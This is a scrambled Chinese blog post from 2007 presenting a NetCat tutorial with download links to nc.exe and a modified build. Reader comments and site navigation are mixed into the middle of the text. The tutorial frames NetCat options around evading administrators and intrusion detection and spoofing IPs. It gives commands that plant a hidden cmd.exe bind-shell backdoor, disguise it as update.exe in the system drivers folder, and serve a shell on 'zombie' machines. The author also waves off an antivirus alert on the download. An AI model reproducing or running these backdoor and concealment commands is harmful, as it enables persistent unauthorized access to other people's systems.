_______________file.cmd________________________
password
cd%windir%
echo[]=[%windir%]
c:
cd
mdtest
cd/d%windir%system32
netstopsksockserver
snake-configport11111
netstartsksockserver
exit
附件:
nc.exe(59392Byte)
附件:
mvnc.exe(188928Byte)
图片附件:
Tags:
nc,下载,瑞士军刀
ThisentrywaspostedonWednesday,February7th,2007at3:
38pmandisfiledunder安全.YoucanfollowanyresponsestothisentrythroughtheRSS2.0feed.Youcanleavearesponse,ortrackbackfromyourownsite.
7Responsesto“瑞士军刀NC下载与使用教程”
1.
abcSays:
March17th,2007at2:
04pm
ncyouduma?
2.
makerSays:
March18th,2007at5:
30am
晕倒,当然没有了,第一个是原版nc,第2个是被改造过的可视化nc.都是我自己用的东西.
3.
柳琴Says:
March25th,2007at3:
24am
其实你很够朋友的~~~当真,哈哈,谢谢你,王墨~~
4.
请教Says:
March26th,2007at4:
34am
nc监听一般要多久才能得到shell啊?
我都等了两个小时了!
………..望指教
5.
makerSays:
April5th,2007at1:
10pm
这个问题就很难回答了,如果没有连接,监听一年都是白费…
6.
fdfdSays:
September6th,2008at8:
57am
靠,刚点链接立马病毒报警
7.
makerSays:
September8th,2008at10:
07am
不懂不要乱说,谁都知道nc多数是用来发动攻击的,杀毒软件当然也不傻.
如果报警就是有病毒那估计这个世界上就没有人下木马了,下灰鸽子安装包的时候也会报警.
LeaveaReply
窗体顶端
Name(required)
Mail(willnotbepublished)(required)
Website
窗体底端
∙Pages
o关于我
o留言簿
o联系我
∙Categories
o代码
o作品
o其他
o分享
o安全
o宣传
o技术
o日记
o相册
o笔记
∙Archives
oApril2010
(1)
oMarch2010 (4)
oFebruary2010
(1)
oJanuary2010
(2)
oOctober2009
(1)
oAugust2009
(1)
oJune2009
(2)
oFebruary2009
(1)
oDecember2008
(1)
oOctober2008 (3)
oSeptember2008 (3)
oAugust2008 (5)
oJuly2008
(1)
oJune2008
(1)
oMay2008
(2)
oApril2008 (5)
oDecember2007
(2)
oNovember2007 (3)
oSeptember2007 (8)
oJuly2007
(2)
oJune2007 (13)
oMay2007 (5)
oMarch2007
(2)
oFebruary2007 (14)
oJanuary2007 (9)
oDecember2006 (10)
oNovember2006 (4)
oSeptember2006
(1)
oAugust2006
(1)
oJuly2006
(2)
∙Blogroll
o4’ssymfonyblog
o积木之城
∙Contributors
o积木之城
∙Meta
oRegister
oLogin
oEntriesRSS
oCommentsRSS
oWordPress.org
(c)2008byMaker’sblog.SitepoweredbyWordPressanddesignedbyAzeemAzeezandDaveRigotti.
Entries(RSS)andComments(RSS).
在入侵中它是最经典的工具之一,NetCat被所有的网络安全爱好者和研究者称之为瑞士军刀,通过名字大家就能知道他的功能足够丰富。
nc的全称为NetCat,它能够建立并接受传输控制协议(TCP)和用户数据报协议(UDP)的连接,Netcat可在这些连接上读写数据,直到连接关闭为止。
它可以通过手工或者脚本与应用层的网络应用程序或服务进行交互。
从技术上来讲,NetCat并不能产生UDP连接,因为UDP是一种无连接的协议。
NetCat没有图形界面,很粗糙,很原始。
nc可以通过很多途径下载得到,unix和Winodws平台下的官方站点是:
http:
//
nc的命令行
nc的基本命令行形式是nc[options]hostports,其中host是要扫描的主机名或IP地址,ports要么是一个单独的端口,要么是一个端口范围(用m-n的形式指定),要么是一系列用空格隔开的单个端口。
-d 只对Windows操作系统有用,该选项使NetCat以隐蔽模式工作,从而脱离MS-DOS命令提示符下环境运行,使得nc不需要保持打开命令窗口便可在监听模式下运行,也可以帮助黑客很好地隐藏监听NetCat实例而不被系统管理员发现。
-e如果NetCat使用gaping_security_hole选项进行编译,那么只要某人在NET后台所监听的任何端口上建立连接,该NetCat都将执行,且客户端的NetCat会通过管道将I/O传输到在别处监听的另一个NetCat实例中。
使用这个选项非常危险,除非你对nc相当了解,起码知道你自己在做什么。
这是在系统中建立后门shell的一个非常快捷且容易的方法。
-i延时间隔,表示在两次数据发送之间nc等待的时间。
例如:
当经过管道传输一个文件到nc的时候,在传输输入的下一行之前,nc将等待的秒数。
当使用nc对一台主机的多个端口之间进行操作时,在切换到下一个端口之前,nc等待的秒数。
这样可以使黑客在进行数据传输或对一个服务进行攻击的时候更加隐蔽,也可以帮助你的端口扫描不被入侵检测系统和系统管理员发现。
-g这个选项具有欺骗性。
nc支持loosesourcerouting(松散源路由)。
你可以在命令行中指定多达8个-g选项来强迫nc流量经过特定的IP地址,这在你为流量设置伪造的源IP地址时,可以利用这个方法达到通过防火墙的过滤器或者允许访问主机列表,希望接收到从主机返回的响应。
-G该选项让用户在-g选项所指定的路由列表中指定的一个地址作为当前的下一路由,由于IP地址为4字节大小(IPV4),所以这个参数总是4字节的倍数;例如,4代表路由表中的第一个IP地址,8代表第二个IP地址,依次类推。
这在伪造部分源路由表使得报文看起来相当的有用。
在进行欺骗和源路由时,这个功能有助于屏蔽你的位置,但也不一定能接收到响应报文,因为响应报文将经过由伪造的IP地址反路由回来。
-l该选项切换nc的监听模式。
此选项必须与-p选项一起使用以告诉nc绑定某个指定的TCP端口并等待到来的连接。
若换成-u选项,则应使用UDP端口而非TCP端口。
-L该选项在Windows版本中有用,当一个连接被关闭后,使用相同的命令行选项进行重启监听模式,即使此时初始的连接已经结束,nc也能在不需要用户干涉的情况下接收后面新的连接。
与-l一样,必须与-p同时使用。
-n该选项告诉我们nc不做任何主机名查找的工作。
-0对数据执行一次十六进制转储(hexdump)并将其存储在hexfile中。
命令nc-ohexfile将把双向通信的数据记录下来,在每行的开始处会有一个“<"或">”用来分别指示是进入数据还是外出数据。
如果只想得到对进入数据的十六进制转储,可以使用nc-ohexfile命令。
-p让用户指定一个nc应使用的本地端口号。
当通过-l或-L选项来使用监听模式的时候,这个参数是必需的。
如果没有为外出连接指定这个参数,则与大多数其他TCP或UDP客户程序的做法一样,nc将使用系统分配给他的任何端口。
-r该参数使nc可以随机选择本地和远程端口。
当使用nc在系统中范围很大的一批端口上获取信息时,要想混合源端口和目标端口的顺序看起来不怎么象端口扫描,这个选项是很有用的。
当这个选项与-i选项和一个足够大的间隔结合使用的时候,在不被注意的端口扫描成功几率能得到很大提升。
-s指定nc建立连接时所使用的IP地址,该选项允许黑客做一些工作,它允许黑客隐藏他们的IP地址或假冒他人的IP地址,但是要得到路由到他们所欺骗的地址的任何信息,都需要使用-g源路由选项。
其次,当处于监听模式时,大多数情况下都可以与一个已经监听的服务“预先绑定”,所有TCP和UDP服务都绑定到某个端口。
-t如果使用telnet选项编译,nc就可以与telnet服务器进行telnet选项协商,虽然它的响应是毫无意义的信息,但可以通过该状态看到连接23端口的信息。
-unc使用UDP而非TCP,在客户模式和监听模式下都起作用。
-v控制nc将要做的事情达到的程度,如使用nc-v,那么nc将仅吐出它所接收到的数据,一个单独的-v可以知道它连接或绑定的地址是否有问题发生,第2个-v可以让nc在一个连接结束的时候让你知道这个连接总共发送和接收了多少数据。
-w控制在一个连接上nc放弃之前等待的时间。
同时也告诉nc当在标准输入上接收到一个eof(end-of-file)之后应该等待多长时间来关闭连接并退出。
如果你通过nc向远程服务器发送命令并且期望大量的数据返回(例如:
向一台web服务器发送一个http命令以下载一个大文件),该选项是很有用的。
nc的具体使用
c:
\nc.exe-l-p4455-d-ecmd.exe可以很好的隐藏一个NetCat后门。
c:
\nc.exe-p4455-d-L-ecmd.exe这个命令可以让黑客利用NetCat重新返回系统,直到系统管理员在任务管理器中看见nc.exe在运行,从而发现这个后门,我们一样可以把它做的更加隐蔽,
c:
\movenc.exec:
\windows\system32\Drivers\update.exe
c:
\windows\systeme32\drivers\update.exe-p4455-d-L-ecmd.exe
系统管理员可能把特权附属于一些无害的程序,如update.exe等,黑客也可以隐藏命令行。
c:
\windows\systme32\drivers\update.exe
cmdline:
-l-p4455-d-L-ecmd.exe
c:
\>
nc-l-p80 监听80端口
nc-l-p80>c:
\log.dat 监听80端口,并把信息记录到log.dat中
nc-v-l-p80 监听80端口,并显示端口信息
nc-vv-l-p80监听80端口,显示更详细的端口信息
nc-l-p80-t-ecmd.exe监听本地的80端口的入站信息,同时将cmd.exe重定向到80端口,当有人连接的时候,就让cmd.exe以telnet的形式应答。
当然这个最好用在控制的肉鸡上。
nc-vipport扫瞄某IP的某个端口
nc-v-zipport-port扫描某IP的端口到某端口
nc-v-z-uip port-port扫描某IP的某UDP端口到某UDP端口